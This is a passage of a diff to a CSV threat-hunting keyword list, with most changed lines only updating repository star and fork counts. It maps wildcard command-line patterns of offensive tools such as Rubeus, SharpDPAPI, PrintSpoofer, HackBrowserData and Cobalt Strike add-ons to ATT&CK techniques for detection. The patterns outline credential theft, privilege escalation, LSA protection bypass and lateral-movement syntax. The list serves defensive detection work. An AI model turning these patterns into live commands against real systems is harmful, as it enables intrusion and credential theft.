T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*.cobaltstrike.beacon_keys*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*.com/dcsync/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*.com/SecureAuthCorp*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecureAuthCorp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.com/SpiderLabs*","offensive_tool_keyword","Github Username","github repo hosting exploitation tools adn documentation for pentesters","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -2256,13 +2256,13 @@ "*.docx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.events.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.exe --b64 --path * --args ","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" -"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe certificates /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -group=remote -computername=*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*.exe * -eventlog *Key Management Service*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*.exe * --source Persistence*","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","348","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" -"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" +"*.exe *.bin -enc aes -lang csharp*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" "*.exe *-searchforest*-pwdlastset*","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","115","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" -"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*.exe /disableLSAProtection*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*.exe action=GetScheduledTaskCOMHandler*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListRunningServices*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" @@ -2275,78 +2275,78 @@ "*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe AzureStorage --connectionstring * --filepath * --extensions *","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8729","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" -"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe certificates /mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe -b all -f json --dir results -cc*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*.exe backupkey /nowrap *.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe certificates /mkfile:*.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe client *:* R:socks*","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe compute --sid * --kdskey *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" -"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","515","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* nla=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* takeover=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* connectdrive=true*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=taskmgr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* elevated=winr*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*.exe computername=* command=* username=* password=* exec=cmd*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe create /payload* /kb*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" -"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe credentials /pvk:*.pvk*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe -d * -u * -p * -m LDAPS*","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","7","1","72","16","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z" -"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -d 1 -c cmd.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -d 3 -c *powershell -ep bypass*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe dump /luid:0x5379f2 /nowrap*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --eventviewer *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*.exe exec * cmd interactive*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*.exe Get-DomainController -Domain * -Server * -Credential *","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" -"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation 